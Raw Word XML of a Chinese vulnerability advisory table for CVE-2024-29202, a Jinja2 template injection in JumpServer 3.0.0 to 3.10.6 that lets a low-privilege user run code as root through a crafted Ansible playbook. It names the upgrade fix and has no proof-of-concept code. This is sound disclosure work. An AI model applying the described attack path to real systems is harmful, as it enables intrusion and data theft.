    <w:p w14:paraId="3DCED68B" w14:textId="18C62D06" w:rsidR="00222029" w:rsidRPr="00222029" w:rsidRDefault="00222029" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00222029">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-29202</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9229" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1569"/>
      </w:tblGrid>
      <w:tr w:rsidR="00222029" w14:paraId="33A21F42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5BA046B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UVD-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82A0D" w14:textId="1C36205B" w:rsidR="00222029" w:rsidRDefault="006E7F0C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6E7F0C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CVE-2024-292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22DF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类别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078F0" w14:textId="4E3FB68E" w:rsidR="00222029" w:rsidRDefault="006E7F0C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6E7F0C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">JINJA2 </w:t>
            </w:r>
            <w:r w:rsidRPr="006E7F0C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>注入代码执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AC644F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VE-ID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EB5D" w14:textId="2BB1E1C5" w:rsidR="00222029" w:rsidRDefault="006E7F0C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6E7F0C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CVE-2024-29202</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222029" w14:paraId="6A1F7324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6D9603F6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披露</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>发现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E2B" w14:textId="29ADF19B" w:rsidR="00222029" w:rsidRDefault="006E7F0C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2024-04-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1DD61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bugtraq</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr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B033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2265D4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NVD-ID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21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92C8F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222029" w14:paraId="254903CE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3911C65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提交时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3340" w14:textId="111A88A6" w:rsidR="00222029" w:rsidRDefault="006E7F0C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932B6E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2024-04-0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E9C896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漏洞发现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EE06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781EB8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CNVD-ID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：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37B5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222029" w14:paraId="15D54544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7D23C2A2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等级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EC805" w14:textId="41F90AC4" w:rsidR="00222029" w:rsidRDefault="006E7F0C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高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7C5BBA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提交者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EEB3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D13BB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搜索关键词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CA71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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222029" w14:paraId="5FB3796D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31CF10FA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影响范围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766" w14:textId="0685DC19" w:rsidR="00222029" w:rsidRDefault="00DB4E12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0A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">JumpServer V3.0.0 </w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>至</w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> V3.10.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222029" w14:paraId="3579AEE2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34630BB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来源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927" w14:textId="709BA897" w:rsidR="00222029" w:rsidRDefault="00DB4E12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0A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CSDN</w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>博客、腾讯云、</w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>FreeBuf</w:t>
            </w:r>
            <w:r w:rsidRPr="000A7EE8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222029" w14:paraId="3C21C9C8" w14:textId="77777777" w:rsidTr="00696358">
        <w:trPr>
          <w:trHeight w:val="412"/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1836EA0C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简介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D8EF3" w14:textId="2C22AD2F" w:rsidR="00222029" w:rsidRDefault="00DB4E12" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>JINJA2</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注入代码执行漏洞，具有低权限用户帐户的攻击者可通过构建恶意</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>playbook</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模板利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Ansible</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Jinja2</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>模板代码注入漏洞在</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Celery</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容器中执行任意代码。由于</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Celery</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容器以</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限运行并具有数据库访问权限，因此攻击者可以从所有主机窃取敏感信息或操纵数据库。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222029" w14:paraId="54FBA20F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7746DEC3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漏洞详情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C843" w14:textId="0442BE3F" w:rsidR="00222029" w:rsidRDefault="00DB4E12" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>攻击者可以利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Jinja2 </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB4E12">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>模板注入漏洞在受影响的容器中执行任意代码，可能导致敏感信息泄露或系统被控制。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222029" w14:paraId="67D6CD98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5484ECB2" w14:textId="77777777" w:rsidR="00222029" w:rsidRDefault="00222029" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="276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t>参考链接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3AF0" w14:textId="0C472677" w:rsidR="00222029" w:rsidRDefault="00DB4E12" w:rsidP="00854BD6">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D9738C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>https://blog.csdn.net/qq_43355651/article/details/137275412  https://cloud.tencent.com/developer/article/1589505  https://www.freebuf.com/vuls/255947.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222029" w14:paraId="024088C0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369A3A34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靶场信息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ABA4" w14:textId="09FB01FA" w:rsidR="00222029" w:rsidRDefault="00DB4E12" w:rsidP="00854BD6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222029" w14:paraId="6DB94EC0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00CADCE2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POC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8740" w14:textId="7D879049" w:rsidR="00222029" w:rsidRDefault="00DB4E12" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如上所示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00222029" w14:paraId="72D4D0AD" w14:textId="77777777" w:rsidTr="00696358">
        <w:trPr>
          <w:jc w:val="center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CDCD" w:themeFill="background2" w:themeFillShade="E5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="790F04C7" w14:textId="77777777" w:rsidR="00222029" w:rsidRDefault="00222029" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修复方案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4166" w14:textId="122C6389" w:rsidR="00222029" w:rsidRDefault="00DB4E12" w:rsidP="00854BD6">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更新到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.10.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本即可</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B48F404" w14:textId="77777777" w:rsidR="00222029" w:rsidRPr="00222029" w:rsidRDefault="00222029" w:rsidP="00854BD6">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00222029" w:rsidRPr="00222029">
      <w:footerReference w:type="default" r:id="rId3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4601D" w14:textId="77777777" w:rsidR="00941B2E" w:rsidRDefault="00941B2E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="164C7D33" w14:textId="77777777" w:rsidR="00941B2E" w:rsidRDefault="00941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8B995" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:rPr>
        <w:b/>
        <w:bCs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9FC380" wp14:editId="601BE5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文本框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F93AD" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="a3"/>
                            <w:rPr>
                              <w:rFonts w:eastAsia="等线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9FC380" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="文本框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3F93AD" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000">
                    <w:pPr>
                      <w:pStyle w:val="a3"/>
                      <w:rPr>
                        <w:rFonts w:eastAsia="等线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B6828" w14:textId="77777777" w:rsidR="00941B2E" w:rsidRDefault="00941B2E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A5BD306" w14:textId="77777777" w:rsidR="00941B2E" w:rsidRDefault="00941B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47271" w14:textId="77777777" w:rsidR="00C60920" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="54D24816" wp14:editId="2224460A">
          <wp:extent cx="899160" cy="359410"/>
          <wp:effectExtent l="0" t="0" r="0" b="635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16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5C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4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942035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5D969B9"/>
    <w:rsid w:val="0000566F"/>
    <w:rsid w:val="00064CFB"/>
    <w:rsid w:val="000A7EE8"/>
    <w:rsid w:val="000B28BB"/>
    <w:rsid w:val="000B5738"/>
    <w:rsid w:val="000C46D9"/>
    <w:rsid w:val="000C74B9"/>
    <w:rsid w:val="000D2F26"/>
    <w:rsid w:val="000F151F"/>
    <w:rsid w:val="000F4DD0"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="00142989"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="001B63D5"/>
    <w:rsid w:val="001C260D"/>
    <w:rsid w:val="001C2869"/>
    <w:rsid w:val="0021666F"/>
    <w:rsid w:val="00222029"/>
    <w:rsid w:val="00224924"/>
    <w:rsid w:val="00273155"/>
    <w:rsid w:val="002C13DA"/>
    <w:rsid w:val="002C4053"/>
    <w:rsid w:val="00307811"/>
    <w:rsid w:val="00366D37"/>
    <w:rsid w:val="00374C22"/>
    <w:rsid w:val="003C1C1E"/>
    <w:rsid w:val="003C2AF6"/>
    <w:rsid w:val="003D1E87"/>
    <w:rsid w:val="003F4A3C"/>
    <w:rsid w:val="00406736"/>
    <w:rsid w:val="0040738E"/>
    <w:rsid w:val="00420EC4"/>
    <w:rsid w:val="004266EA"/>
    <w:rsid w:val="0046096B"/>
    <w:rsid w:val="00463752"/>
    <w:rsid w:val="004701F0"/>
    <w:rsid w:val="004806EA"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004A2DAF"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="004E06F0"/>
    <w:rsid w:val="004F44F4"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="00534A8B"/>
    <w:rsid w:val="00534E98"/>
    <w:rsid w:val="005C65F0"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00613200"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="00635F9F"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00644655"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006462C1"/>
    <w:rsid w:val="00664CFE"/>
    <w:rsid w:val="00667AD1"/>
    <w:rsid w:val="006841D9"/>
    <w:rsid w:val="00687755"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="006A127C"/>
    <w:rsid w:val="006A515D"/>
    <w:rsid w:val="006D43B9"/>
    <w:rsid w:val="006E7F0C"/>
    <w:rsid w:val="00710C76"/>
    <w:rsid w:val="007346D6"/>
    <w:rsid w:val="00757A7B"/>
    <w:rsid w:val="00767CC1"/>
    <w:rsid w:val="0078527B"/>
    <w:rsid w:val="007A0AEE"/>
    <w:rsid w:val="007A2CFF"/>
    <w:rsid w:val="007C12D5"/>
    <w:rsid w:val="007F167F"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00854BD6"/>
    <w:rsid w:val="00884163"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="00893233"/>
    <w:rsid w:val="008B1480"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="008F2390"/>
    <w:rsid w:val="00932B6E"/>
    <w:rsid w:val="00935819"/>
    <w:rsid w:val="00941B2E"/>
    <w:rsid w:val="009547AE"/>
    <w:rsid w:val="009718CF"/>
    <w:rsid w:val="009E17D1"/>
    <w:rsid w:val="009F0008"/>
    <w:rsid w:val="00A22D1A"/>
    <w:rsid w:val="00A42F86"/>
    <w:rsid w:val="00A60BD3"/>
    <w:rsid w:val="00A64E20"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00A96E2E"/>
    <w:rsid w:val="00A96F31"/>
    <w:rsid w:val="00AA2ACE"/>
    <w:rsid w:val="00AB3661"/>
    <w:rsid w:val="00AF29BC"/>
    <w:rsid w:val="00AF4B8F"/>
    <w:rsid w:val="00B01D5F"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00B616BC"/>
    <w:rsid w:val="00B8113A"/>
    <w:rsid w:val="00BC10B3"/>
    <w:rsid w:val="00BC1458"/>
    <w:rsid w:val="00BE3233"/>
    <w:rsid w:val="00BE3C25"/>
    <w:rsid w:val="00BE6AB3"/>
    <w:rsid w:val="00BF45CE"/>
    <w:rsid w:val="00C36058"/>
    <w:rsid w:val="00C60920"/>
    <w:rsid w:val="00D21BCF"/>
    <w:rsid w:val="00D27F35"/>
    <w:rsid w:val="00D615F1"/>
    <w:rsid w:val="00D9738C"/>
    <w:rsid w:val="00DB4E12"/>
    <w:rsid w:val="00DC1C4A"/>
    <w:rsid w:val="00E10B27"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E46D64"/>
    <w:rsid w:val="00E62A07"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00ED454F"/>
    <w:rsid w:val="00EF4596"/>
    <w:rsid w:val="00F25879"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="00FE1114"/>
    <w:rsid w:val="00FE60CB"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78A8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110AE0"/>
  <w15:docId w15:val="{C6667334-175A-4144-AAB9-E1F9090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Indent 2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2"/>
    <w:qFormat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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after="100" w:line="400" w:lineRule="exact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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="400" w:lineRule="exact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uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="290" w:line="372" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="黑体"/>
      <w:b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20">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000"/>
    </w:r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  <w:rPr>
      <w:b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A7">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:kern w:val="21"/>
      <w:szCs w:val="21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table" w:styleId="a8">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00A6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F59DC3-28FB-4192-96B8-5617BFE56A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1430</Words>
  <Characters>8153</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>67</Lines>
  <Paragraphs>19</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9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orever lazy</cp:lastModifiedBy>
  <cp:revision>119</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-06T05:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-27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F961DC4C1D9B460CAB021EA163E041CB</vt:lpwstr>
  </property>
</Properties>
</file>